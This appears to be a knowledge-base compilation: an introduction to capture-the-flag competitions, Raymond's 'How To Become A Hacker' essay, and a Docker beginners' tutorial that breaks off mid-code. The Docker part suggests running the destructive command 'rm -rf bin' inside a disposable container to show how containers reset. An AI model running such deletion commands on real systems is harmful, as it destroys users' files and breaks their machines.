About this knowledge base
CTF 101
CTF Introduction
Capture the Flag competitions, or CTFs, are a kind of computer security competition.
Teams of competitors (or just individuals) are pitted against each other in a test of computer security skills.
Very often CTFs are the beginning of one's cyber security career due to their team-building nature and competitive aspect. In addition, there isn't a lot of commitment required beyond a weekend.
Origin of CTF
CTF's predecessor was an informal contest of networking skills between hackers. The CTF format itself originated at the 4th DEFCON in 1996.
Early CTF Competitions
The first CTF competitions (1996 - 2001) had no clear rules and no professionally built competition platform or environment. Each team had to prepare and defend its own targets while trying to break the targets of the other teams. The organizers were mostly non-professional volunteers who scored manually, at the request of the participating teams.
The lack of automated back-end systems and of technical competence among the judges, together with scoring delays and errors, unreliable networks, and improper configurations, led to a great deal of controversy and dissatisfaction.
The "Modern" CTF Competition
In the modern format, a professional team is responsible for the competition platform, challenge design, event organization, and automated scoring system. Teams are required to submit applications and are selected by the DEFCON conference organizers.
The following features stand out for the three years of DEFCON CTF competitions organized by LegitBS.
- The competition focuses on core competencies in low-level computer and system security; web vulnerability techniques are completely ignored.
- The competition environment spans multiple CPU instruction set architectures, operating systems, and programming languages.
- "Zero-sum" scoring rules are used.
- The team's comprehensive ability is tested: reverse engineering, vulnerability discovery, vulnerability exploitation, vulnerability patching and hardening, network traffic analysis, system security operations and maintenance, and security-oriented programming and debugging.
CTF Competition Types
Jeopardy is commonly used in online qualifying competitions. In a Jeopardy CTF, teams participate over the Internet or an on-site network and earn points by solving cybersecurity challenges, either by interacting with an online environment or by analyzing files offline. The format resembles ACM programming contests and informatics Olympiads, and teams are ranked by total points and time.
Jeopardy-style competitions generally award first blood, second blood, and third blood: the first three teams to solve a challenge receive bonus points. This rewards the teams that solve a challenge first and also indirectly reflects a team's ability.
Of course there is also a popular scoring rule that sets the initial score for each question and then gradually reduces the score of the question according to the number of teams that have successfully answered the question, meaning that the more people answer the question, the lower the score of the question will be. Eventually it will drop to a guaranteed score and then stop dropping.
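As a rough illustration of this decaying rule, the sketch below lowers a challenge's score as more teams solve it and stops at a guaranteed minimum. The quadratic curve and the parameter names initial, minimum, and decay are assumptions chosen for the example; each competition picks its own formula.

```python
import math


def dynamic_score(initial: int, minimum: int, decay: int, solves: int) -> int:
    """Return the current value of a challenge after `solves` teams solved it.

    Assumed (hypothetical) rule: the value falls along a parabola from
    `initial` and reaches `minimum` once `decay` teams have solved it.
    """
    if decay <= 0:
        raise ValueError("decay must be positive")
    solves = max(solves, 0)
    value = (minimum - initial) / (decay ** 2) * (solves ** 2) + initial
    # Never drop below the guaranteed score.
    return max(minimum, math.ceil(value))


if __name__ == "__main__":
    # Print how a 500-point challenge decays toward its 100-point floor.
    for solves in (0, 5, 10, 20, 50):
        print(solves, dynamic_score(500, 100, 20, solves))
```

With these example parameters the score starts at 500 and stays at 100 once 20 or more teams have solved the challenge.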
The challenges fall into six main categories: Web (web attack and defense), RE (reverse engineering), Pwn (binary exploitation), Crypto (cryptographic attacks), Mobile (mobile security), and Misc (miscellaneous security topics).
CTF Contest Contents
Since CTFs cover a wide range of topics, there are no clear boundaries as to what will be tested. Current competition challenges, however, are mainly classified into the common categories of Web (web attack and defense), RE (reverse engineering), Pwn (binary vulnerability exploitation), Crypto (cryptographic attacks), Mobile (mobile security), and Misc (miscellaneous security topics).
Web - Web Attack and Defense
This part mainly introduces the common vulnerabilities in Web security, such as SQL injection, XSS, CSRF, file inclusion, file upload, code audit, and PHP weak typing, along with common challenges and solutions in Web security and some common tools.
RE - Reverse Engineering
This part mainly introduces the common challenge types, tools and platforms, and solution approaches in reverse engineering. The advanced part introduces common software protection, decompilation, anti-debugging, packing, and unpacking techniques.
Pwn - Binary Vulnerability Exploitation
Pwn challenges mainly examine the discovery and exploitation of binary vulnerabilities, which requires some understanding of how the underlying operating system works. In CTF competitions, Pwn challenges are mainly found on the Linux platform.
Crypto - Cryptographic Attacks
Classical cryptography is interesting and diverse, while modern cryptography is highly secure and requires high algorithmic understanding.
Mobile - Mobile Security
This part mainly introduces the common tools and main challenge types in Android reverse engineering, which often requires some knowledge of Android development. iOS reverse engineering challenges are less frequent in CTF competitions, so they are not covered in much detail.
Misc - Security Miscellaneous
Using the book "Online Ghost: The Autobiography of Mitnick, the World's Number One Hacker" (translated by Zhuge Jianwei) and some typical Misc challenges as entry points, this part mainly covers information gathering, encoding analysis, forensic analysis, steganography analysis, etc.
How To Become A Hacker
What Is a Hacker?
The Jargon File contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are relevant.
There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker.
The hacker mindset is not confined to this software-hacker culture. Some people apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is independent of the particular medium the hacker works in. But in the rest of this document, we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’.
There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end.
The basic difference is this: hackers build things, and crackers break them.
If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers.
The Hacker Attitude
- The world is full of fascinating problems waiting to be solved.
- No problem should ever have to be solved twice.
- Boredom and drudgery are evil.
- Freedom is good.
- Attitude is no substitute for competence.
Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.
But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you, for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mindset of masters, not just intellectually but emotionally as well.
Or, as the following modern Zen poem has it:
To follow the path: look to the master, follow the master, walk with the master, see through the master, become the master.
So, if you want to be a hacker, repeat the following things until you believe them:
1. The world is full of fascinating problems waiting to be solved.
Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, and in pushing themselves past their physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.
If you aren't the kind of person that feels this way naturally, you'll need to become one to make it as a hacker. Otherwise, you'll find your hacking energy is sapped by distractions like sex, money, and social approval.
(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece — and so on, until you're done.)
2. No problem should ever have to be solved twice.
Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.
To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.
Note, however, that "No problem should ever have to be solved twice." does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn't know before by studying the first cut at a solution. It's OK, and often necessary, to decide that we can do better. What's not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and force people to re-invent wheels.
(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get the most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.)
3. Boredom and drudgery are evil.
Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work because when this happens it means they aren't doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but evil.
To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).
(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)
4. Freedom is good.
Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by, and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.
(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kind of authority to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)
Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like the ‘cooperation’ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.
5. Attitude is no substitute for competence.
To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.
Therefore, you have to learn to distrust attitudes and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.
If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.
Reference
- https://ctf101.org/
- http://www.catb.org/~esr/faqs/hacker-howto.html
- https://ctf-wiki.org/
Docker for beginners
https://docker-curriculum.com/
by Prakhar Srivastav
Introduction
What is Docker?
Wikipedia defines Docker as
an open-source project that automates the deployment of software applications inside containers by providing an additional layer of abstraction and automation of OS-level virtualization on Linux.
Wow! That's a mouthful. In simpler words, Docker is a tool that allows developers, sys-admins, etc. to easily deploy their applications in a sandbox (called containers) to run on the host operating system i.e. Linux. The key benefit of Docker is that it allows users to package an application with all of its dependencies into a standardized unit for software development. Unlike virtual machines, containers do not have high overhead and hence enable more efficient usage of the underlying system and resources.
What are containers?
The industry standard today is to use Virtual Machines (VMs) to run software applications. VMs run applications inside a guest Operating System, which runs on virtual hardware powered by the server’s host OS.
VMs are great at providing full process isolation for applications: there are very few ways a problem in the host operating system can affect the software running in the guest operating system, and vice-versa. But this isolation comes at a great cost — the computational overhead spent virtualizing hardware for a guest OS to use is substantial.
Containers take a different approach: by leveraging the low-level mechanics of the host operating system, containers provide most of the isolation of virtual machines at a fraction of the computing power.
Why use containers?
Containers offer a logical packaging mechanism in which applications can be abstracted from the environment in which they run. This decoupling allows container-based applications to be deployed easily and consistently, regardless of whether the target environment is a private data center, the public cloud, or even a developer’s laptop. This gives developers the ability to create predictable environments that are isolated from the rest of the applications and can be run anywhere.
From an operations standpoint, apart from portability containers also give more granular control over resources giving your infrastructure improved efficiency which can result in better utilization of your compute resources.
Google Trends for Docker
Due to these benefits, containers (& Docker) have seen widespread adoption. Companies like Google, Facebook, Netflix, and Salesforce leverage containers to make large engineering teams more productive and to improve the utilization of computing resources. Google credited containers for eliminating the need for an entire data center.
What will this tutorial teach me?
This tutorial aims to be the one-stop shop for getting your hands dirty with Docker. Apart from demystifying the Docker landscape, it'll give you hands-on experience building and deploying your web apps on the Cloud. We'll be using Amazon Web Services to deploy a static website, and two dynamic web apps on EC2 using Elastic Beanstalk and Elastic Container Service. Even if you have no prior experience with deployments, this tutorial should be all you need to get started.
GETTING STARTED
This document contains a series of several sections, each of which explains a particular aspect of Docker. We will be typing commands (or writing code) in each section. All the code used in the tutorial is available in the GitHub repo.
Note: This tutorial uses version 18.05.0-ce of Docker. If you find any part of the tutorial incompatible with a future version, please raise an issue. Thanks!
Prerequisites
There are no specific skills needed for this tutorial beyond a basic comfort with the command line and using a text editor. This tutorial uses git clone to clone the repository locally. If you don't have Git installed on your system, either install it or remember to manually download the zip files from GitHub. Prior experience in developing web applications will be helpful but is not required. As we proceed further along the tutorial, we'll make use of a few cloud services. If you're interested in following along, please create an account on each of these websites:
Setting up your computer
Getting all the tooling set up on your computer can be a daunting task, but thankfully, as Docker has become stable, getting Docker up and running on your favorite OS has become very easy.
Until a few releases ago, running Docker on OSX and Windows was quite a hassle. Lately however, Docker has invested significantly into improving the on-boarding experience for its users on these OSes, thus running Docker now is a cakewalk. The getting started guide on Docker has detailed instructions for setting up Docker on Mac, Linux and Windows.
Once you are done installing Docker, test your Docker installation by running the following:
$ docker run hello-world
Hello from Docker.
This message shows that your installation appears to be working correctly.
...
HELLO WORLD
Playing with Busybox
Now that we have everything set up, it's time to get our hands dirty. In this section, we are going to run a Busybox container on our system and get a taste of the docker run command.
To get started, let's run the following in our terminal:
$ docker pull busybox
Note: Depending on how you've installed docker on your system, you might see a permission denied error after running the above command. If you're on a Mac, make sure the Docker engine is running. If you're on Linux, then prefix your docker commands with sudo. Alternatively, you can create a docker group to get rid of this issue.
The pull command fetches the busybox image from the Docker registry and saves it to our system. You can use the docker images command to see a list of all images on your system.
$ docker images
REPOSITORY TAG IMAGE ID CREATED VIRTUAL SIZE
busybox latest c51f86c28340 4 weeks ago 1.109 MB
Docker Run
Great! Let's now run a Docker container based on this image. To do that we are going to use the almighty docker run command.
$ docker run busybox
Wait, nothing happened! Is that a bug? Well, no. Behind the scenes, a lot of stuff happened. When you call run, the Docker client finds the image (busybox in this case), loads up the container and then runs a command in that container. When we ran docker run busybox, we didn't provide a command, so the container booted up, ran an empty command and then exited. Well, yeah - kind of a bummer. Let's try something more exciting.
$ docker run busybox echo "hello from busybox"
hello from busybox
Nice - finally we see some output. In this case, the Docker client dutifully ran the echo command in our busybox container and then exited it. If you've noticed, all of that happened pretty quickly. Imagine booting up a virtual machine, running a command and then killing it. Now you know why they say containers are fast! Ok, now it's time to see the docker ps command. The docker ps command shows you all containers that are currently running.
$ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
Since no containers are running, we see a blank line. Let's try a more useful variant: docker ps -a
$ docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
305297d7a235 busybox "uptime" 11 minutes ago Exited (0) 11 minutes ago distracted_goldstine
ff0a5c3750b9 busybox "sh" 12 minutes ago Exited (0) 12 minutes ago elated_ramanujan
14e5bd11d164 hello-world "/hello" 2 minutes ago Exited (0) 2 minutes ago thirsty_euclid
So what we see above is a list of all containers that we ran. Do notice that the STATUS column shows that these containers exited a few minutes ago.
You're probably wondering if there is a way to run more than just one command in a container. Let's try that now:
$ docker run -it busybox sh
/ # ls
bin dev etc home proc root sys tmp usr var
/ # uptime
05:45:21 up 5:58, 0 users, load average: 0.00, 0.01, 0.04
Running the run command with the -it flags attaches us to an interactive tty in the container. Now we can run as many commands in the container as we want. Take some time to run your favorite commands.
Danger Zone: If you're feeling particularly adventurous you can try rm -rf bin in the container. Make sure you run this command in the container and not on your laptop/desktop. Doing this will make other commands like ls and uptime stop working. Once everything stops working, you can exit the container (type exit and press Enter) and then start it up again with the docker run -it busybox sh command. Since Docker creates a new container every time, everything should start working again.
That concludes a whirlwind tour of the mighty docker run command, which would most likely be the command you'll use most often. It makes sense to spend some time getting comfortable with it. To find out more about run, use docker run --help to see a list of all flags it supports. As we proceed further, we'll see a few more variants of docker run.
Before we move ahead though, let's quickly talk about deleting containers. We saw above that we can still see remnants of the container even after we've exited by running docker ps -a. Throughout this tutorial, you'll run docker run multiple times and leaving stray containers will eat up disk space. Hence, as a rule of thumb, I clean up containers once I'm done with them. To do that, you can run the docker rm command. Just copy the container IDs from above and paste them alongside the command.
$ docker rm 305297d7a235 ff0a5c3750b9
305297d7a235
ff0a5c3750b9
On deletion, you should see the IDs echoed back to you. If you have a bunch of containers to delete in one go, copy-pasting IDs can be tedious. In that case, you can simply run -
$ docker rm $(docker ps -a -q -f status=exited)
This command deletes all containers that have a status of exited. In case you're wondering, the -q flag returns only the container IDs and -f filters output based on the conditions provided. One last thing that'll be useful is the --rm flag, which can be passed to docker run and automatically deletes the container once it exits. For one-off docker runs, the --rm flag is very useful.
In later versions of Docker, the docker container prune command can be used to achieve the same effect.
$ docker container prune
WARNING! This will remove all stopped containers.
Are you sure you want to continue? [y/N] y
Deleted Containers:
4a7f7eebae0f63178aff7eb0aa39f0627a203ab2df258c1a00b456cf20063
f98f9c2aa1eaf727e4ec9c0283bcaa4762fbdba7f26191f26c97f64090360
Total reclaimed space: 212 B
Lastly, you can also delete images that you no longer need by running docker rmi.
Terminology
In the last section, we used a lot of Docker-specific jargon which might be confusing to some. So before we go further, let me clarify some terminology that is used frequently in the Docker ecosystem.
- Images - The blueprints of our application which form the basis of containers. In the demo above, we used the docker pull command to download the busybox image.
- Containers - Created from Docker images and run the actual application. We create a container using docker run which we did using the busybox image that we downloaded. A list of running containers can be seen using the docker ps command.
- Docker Daemon - The background service running on the host that manages building, running and distributing Docker containers. The daemon is the process that runs in the operating system which clients talk to.
- Docker Client - The command line tool that allows the user to interact with the daemon. More generally, there can be other forms of clients too - such as Kitematic which provide a GUI to the users.
- Docker Hub - A registry of Docker images. You can think of the registry as a directory of all available Docker images. If required, one can host their own Docker registries and can use them for pulling images.
WEBAPPS WITH DOCKER
Great! So we have now looked at docker run, played with a Docker container and also got a hang of some terminology. Armed with all this knowledge, we are now ready to get to the real-stuff, i.e. deploying web applications with Docker!
Static Sites
Let's start by taking baby-steps. The first thing we're going to look at is how we can run a dead-simple static website. We're going to pull a Docker image from Docker Hub, run the container and see how easy it is to run a webserver.
Let's begin. The image that we are going to use is a single-page website that I've already created for the purpose of this demo and hosted on the registry - prakhar1989/static-site. We can download and run the image directly in one go using docker run. As noted above, the --rm flag automatically removes the container when it exits and the -it flag specifies an interactive terminal which makes it easier to kill the container with Ctrl+C (on windows).
$ docker run --rm -it prakhar1989/static-site
Since the image doesn't exist locally, the client will first fetch the image from the registry and then run the image. If all goes well, you should see a "Nginx is running..." message in your terminal. Okay, now that the server is running, how do we see the website? What port is it running on? And more importantly, how do we access the container directly from our host machine? Hit Ctrl+C to stop the container.
Well, in this case, the client is not exposing any ports so we need to re-run the docker run command to publish ports. While we're at it, we should also find a way so that our terminal is not attached to the running container. This way, you can happily close your terminal and keep the container running. This is called detached mode.
$ docker run -d -P --name static-site prakhar1989/static-site
e61d12292d69556eabe2a44c16cbd54486b2527e2ce4f95438e504afb7b02810
In the above command, -d will detach our terminal, -P will publish all exposed ports to random ports and finally --name corresponds to a name we want to give. Now we can see the ports by running the docker port [CONTAINER] command:
$ docker port static-site
80/tcp -> 0.0.0.0:32769
443/tcp -> 0.0.0.0:32768
You can open http://localhost:32769 in your browser.
Note: If you're using docker-toolbox, then you might need to use docker-machine ip default to get the IP.
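If you want to pick the host port out of that output from a script, a small parser is enough. The sketch below assumes the output has the "CONTAINER_PORT -> HOST_IP:HOST_PORT" shape shown above; the function name parse_docker_port is hypothetical and not part of Docker.

```python
from typing import Dict, Tuple


def parse_docker_port(output: str) -> Dict[str, Tuple[str, int]]:
    """Map each container port (e.g. "80/tcp") to its (host_ip, host_port)."""
    mappings: Dict[str, Tuple[str, int]] = {}
    for line in output.splitlines():
        line = line.strip()
        if "->" not in line:
            continue  # skip blank or unexpected lines
        container_port, host = (part.strip() for part in line.split("->", 1))
        # Split on the last colon so bracketed IPv6 hosts such as [::] also work.
        host_ip, _, host_port = host.rpartition(":")
        # Keep the first mapping if the same container port is listed twice.
        mappings.setdefault(container_port, (host_ip, int(host_port)))
    return mappings


if __name__ == "__main__":
    sample = "80/tcp -> 0.0.0.0:32769\n443/tcp -> 0.0.0.0:32768"
    _, port = parse_docker_port(sample)["80/tcp"]
    print(f"http://localhost:{port}")
```

In practice the text would come from running docker port static-site, for example through Python's subprocess module.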
You can also specify a custom port to which the client will forward connections to the container.
$ docker run -p 8888:80 prakhar1989/static-site
Nginx is running...
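The flags seen so far (--rm, -d, -P, -p and --name) can also be assembled from a script. The following is a minimal sketch that only builds the argument list; the helper name docker_run_argv and its parameters are made up for this example.

```python
from typing import List, Optional, Sequence


def docker_run_argv(
    image: str,
    name: Optional[str] = None,
    detach: bool = False,
    publish_all: bool = False,
    publish: Sequence[str] = (),
    remove: bool = False,
) -> List[str]:
    """Build the argument list for a `docker run` invocation."""
    argv = ["docker", "run"]
    if remove:
        argv.append("--rm")      # delete the container once it exits
    if detach:
        argv.append("-d")        # detached mode: do not attach the terminal
    if publish_all:
        argv.append("-P")        # publish all exposed ports to random host ports
    for mapping in publish:
        argv += ["-p", mapping]  # explicit HOST:CONTAINER mapping, e.g. "8888:80"
    if name:
        argv += ["--name", name]
    argv.append(image)
    return argv


if __name__ == "__main__":
    print(" ".join(docker_run_argv(
        "prakhar1989/static-site", name="static-site", detach=True, publish_all=True)))
```

Passing the resulting list to subprocess.run(argv, check=True) would start the container, provided Docker is installed and the daemon is running.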
To stop a detached container, run docker stop by giving the container ID. In this case, we can use the name static-site we used to start the container.
$ docker stop static-site
static-site
I'm sure you agree that was super simple. To deploy this on a real server you would just need to install Docker, and run the above Docker command. Now that you've seen how to run a webserver inside a Docker image, you must be wondering - how do I create my own Docker image? This is the question we'll be exploring in the next section.
Docker Images
We've looked at images before, but in this section we'll dive deeper into what Docker images are and build our own image! Lastly, we'll also use that image to run our application locally and finally deploy on AWS to share it with our friends! Excited? Great! Let's get started.
Docker images are the basis of containers. In the previous example, we pulled the Busybox image from the registry and asked the Docker client to run a container based on that image. To see the list of images that are available locally, use the docker images command.
$ docker images
REPOSITORY TAG IMAGE ID CREATED VIRTUAL SIZE
prakhar1989/catnip latest c7ffb5626a50 2 hours ago 697.9 MB
prakhar1989/static-site latest b270625a1631 21 hours ago 133.9 MB
python 3-onbuild cf4002b2c383 5 days ago 688.8 MB
martin/docker-cleanup-volumes latest b42990daaca2 7 weeks ago 22.14 MB
ubuntu latest e9ae3c220b23 7 weeks ago 187.9 MB
busybox latest c51f86c28340 9 weeks ago 1.109 MB
hello-world latest 0a6ba66e537a 11 weeks ago 960 B
The above gives a list of images that I've pulled from the registry, along with ones that I've created myself (we'll shortly see how). The TAG refers to a particular snapshot of the image and the IMAGE ID is the corresponding unique identifier for that image.
For simplicity, you can think of an image as akin to a git repository - images can be committed with changes and have multiple versions. If you don't provide a specific version number, the client defaults to latest. For example, you can pull a specific version of the ubuntu image:
$ docker pull ubuntu:18.04
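To make the "defaults to latest" rule concrete, here is a minimal sketch that splits an image reference into a name and a tag. The helper name split_image_reference is hypothetical, and the sketch deliberately ignores digest references (the name@sha256:... form).

```python
from typing import Tuple


def split_image_reference(reference: str) -> Tuple[str, str]:
    """Split "name[:tag]" into (name, tag), defaulting the tag to "latest"."""
    last_slash = reference.rfind("/")
    last_colon = reference.rfind(":")
    # A colon before the last slash belongs to a registry host:port, not a tag.
    if last_colon > last_slash:
        return reference[:last_colon], reference[last_colon + 1:]
    return reference, "latest"


if __name__ == "__main__":
    for ref in ("ubuntu:18.04", "busybox", "prakhar1989/static-site"):
        print(ref, "->", split_image_reference(ref))
```

The comparison against the last slash is there so that a registry address with a port, such as localhost:5000/app, is not mistaken for a tagged image.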
To get a new Docker image you can either get it from a registry (such as the Docker Hub) or create your own. There are tens of thousands of images available on Docker Hub. You can also search for images directly from the command line using docker search.
An important distinction to be aware of when it comes to images is the difference between base and child images.
- Base images are images that have no parent image, usually images with an OS like ubuntu, busybox or debian.
- Child images are images that build on base images and add additional functionality.
Then there are official and user images, which can be both base and child images.
- Official images are images that are officially maintained and supported by the folks at Docker. These are typically one word long. In the list of images above, the python, ubuntu, busybox and hello-world images are official images.
- User images are images created and shared by users like you and me. They build on base images and add additional functionality. Typically, these are formatted as user/image-name.
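To make the naming rules above concrete, here is a minimal Python sketch that splits an image reference into its repository and tag, falling back to latest when no tag is given. The function names are my own, and the user-image check is only a naming heuristic: names that include a registry host also contain a slash, and digest references are not handled.

```python
def parse_image_reference(reference):
    """Split an image reference into (repository, tag).

    The tag separator is a colon that appears after the last slash, so a
    registry port such as localhost:5000/app is not mistaken for a tag.
    Digest references (name@sha256:...) are not handled in this sketch.
    """
    last_segment = reference.rsplit("/", 1)[-1]
    if ":" in last_segment:
        repository, tag = reference.rsplit(":", 1)
    else:
        # No tag given: fall back to the same default the client uses.
        repository, tag = reference, "latest"
    return repository, tag


def looks_like_user_image(reference):
    """Naming heuristic only: user images are written as user/image-name."""
    repository, _ = parse_image_reference(reference)
    return "/" in repository


print(parse_image_reference("ubuntu"))
print(parse_image_reference("ubuntu:18.04"))
print(looks_like_user_image("prakhar1989/catnip"))
```

With this, ubuntu and ubuntu:latest name the same thing, while ubuntu:18.04 pins one particular version.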
Our First Image
Now that we have a better understanding of images, it's time to create our own. Our goal in this section will be to create an image that sandboxes a simple Flask application. For the purposes of this workshop, I've already created a fun little Flask app that displays a random cat .gif every time it is loaded - because you know, who doesn't like cats? If you haven't already, please go ahead and clone the repository locally like so -
$ git clone https://github.com/prakhar1989/docker-curriculum.git
$ cd docker-curriculum/flask-app
This should be cloned on the machine where you are running the docker commands and not inside a docker container.
The next step now is to create an image with this web app. As mentioned above, all user images are based on a base image. Since our application is written in Python, the base image we're going to use will be Python 3.
Dockerfile
A Dockerfile is a simple text file that contains a list of commands that the Docker client calls while creating an image. It's a simple way to automate the image creation process. The best part is that the commands you write in a Dockerfile are almost identical to their equivalent Linux commands. This means you don't really have to learn new syntax to create your own Dockerfiles.
The application directory does contain a Dockerfile but since we're doing this for the first time, we'll create one from scratch. To start, create a new blank file in your favorite text editor and save it in the same folder as the flask app by the name of Dockerfile.
We start with specifying our base image. Use the FROM keyword to do that -
FROM python:3.8
The next step usually is to write the commands for copying the files and installing the dependencies. First, we set a working directory and then copy all the files for our app.
# set a directory for the app
WORKDIR /usr/src/app
# copy all the files to the container
COPY . .
Now that we have the files, we can install the dependencies.
# install dependencies
RUN pip install --no-cache-dir -r requirements.txt
The next thing we need to specify is the port number that needs to be exposed. Since our flask app is running on port 5000, that's what we'll indicate.
EXPOSE 5000
The last step is to write the command for running the application, which is simply - python ./app.py. We use the CMD command to do that -
CMD ["python", "./app.py"]
The primary purpose of CMD is to tell the container which command it should run when it is started. With that, our Dockerfile is now ready. This is how it looks -
FROM python:3.8
# set a directory for the app
WORKDIR /usr/src/app
# copy all the files to the container
COPY . .
# install dependencies
RUN pip install --no-cache-dir -r requirements.txt
# define the port number the container should expose
EXPOSE 5000
# run the command
CMD ["python", "./app.py"]
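If it helps to see the structure of the file spelled out, here is a small Python sketch that reads the Dockerfile above and lists its instructions in order. This is only an illustration of the format (one instruction per line, comments starting with #), not how Docker itself parses the file, and the function name is my own. Line continuations are deliberately left out.

```python
DOCKERFILE = """\
FROM python:3.8
# set a directory for the app
WORKDIR /usr/src/app
# copy all the files to the container
COPY . .
# install dependencies
RUN pip install --no-cache-dir -r requirements.txt
# define the port number the container should expose
EXPOSE 5000
# run the command
CMD ["python", "./app.py"]
"""


def list_instructions(dockerfile_text):
    """Return (INSTRUCTION, arguments) pairs, skipping comments and blanks.

    Line continuations with a trailing backslash are not handled here.
    """
    steps = []
    for line in dockerfile_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        instruction, _, arguments = line.partition(" ")
        steps.append((instruction.upper(), arguments.strip()))
    return steps


for number, (instruction, arguments) in enumerate(list_instructions(DOCKERFILE), start=1):
    print(f"{number}. {instruction} {arguments}")
```

Our file boils down to six instructions: FROM, WORKDIR, COPY, RUN, EXPOSE and CMD.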
Now that we have our Dockerfile, we can build our image. The docker build command does the heavy-lifting of creating a Docker image from a Dockerfile.
The section below shows you the output of running the same. Before you run the command yourself (don't forget the period), make sure to replace my username with yours. This username should be the same one you created when you registered on Docker Hub. If you haven't done that yet, please go ahead and create an account. The docker build command is quite simple - it takes an optional tag name with -t and a location of the directory containing the Dockerfile.
$ docker build -t yourusername/catnip .
Sending build context to Docker daemon 8.704 kB
Step 1 : FROM python:3.8
# Executing 3 build triggers...
Step 1 : COPY requirements.txt /usr/src/app/
---> Using cache
Step 1 : RUN pip install --no-cache-dir -r requirements.txt
---> Using cache
Step 1 : COPY . /usr/src/app
---> 1d61f639ef9e
Removing intermediate container 4de6ddf5528c
Step 2 : EXPOSE 5000
---> Running in 12cfcf6d67ee
---> f423c2f179d1
Removing intermediate container 12cfcf6d67ee
Step 3 : CMD python ./app.py
---> Running in f01401a5ace9
---> 13e87ed1fbc2
Removing intermediate container f01401a5ace9
Successfully built 13e87ed1fbc2
If you don't have the python:3.8 image, the client will first pull the image and then create your image. Hence, your output from running the command will look different from mine. If everything went well, your image should be ready! Run docker images and see if your image shows.
The last step in this section is to run the image and see if it actually works (replacing my username with yours).
$ docker run -p 8888:5000 yourusername/catnip
* Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)
The command we just ran used port 5000 for the server inside the container and exposed this externally on port 8888. Head over to the URL with port 8888, where your app should be live.
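The order of the two numbers in -p 8888:5000 is easy to mix up, so here is a tiny Python sketch that spells it out: the host port comes first, the container port second. The function name is my own, and only the two-part form used in this tutorial is handled. The localhost URL assumes Docker is running on your own machine.

```python
def parse_publish(spec):
    """Parse the HOST_PORT:CONTAINER_PORT form of the -p flag.

    Only the two-part form used in this tutorial is handled; forms with a
    bind address or a protocol suffix are left out of this sketch.
    """
    host_port, container_port = spec.split(":")
    return {"host_port": int(host_port), "container_port": int(container_port)}


mapping = parse_publish("8888:5000")
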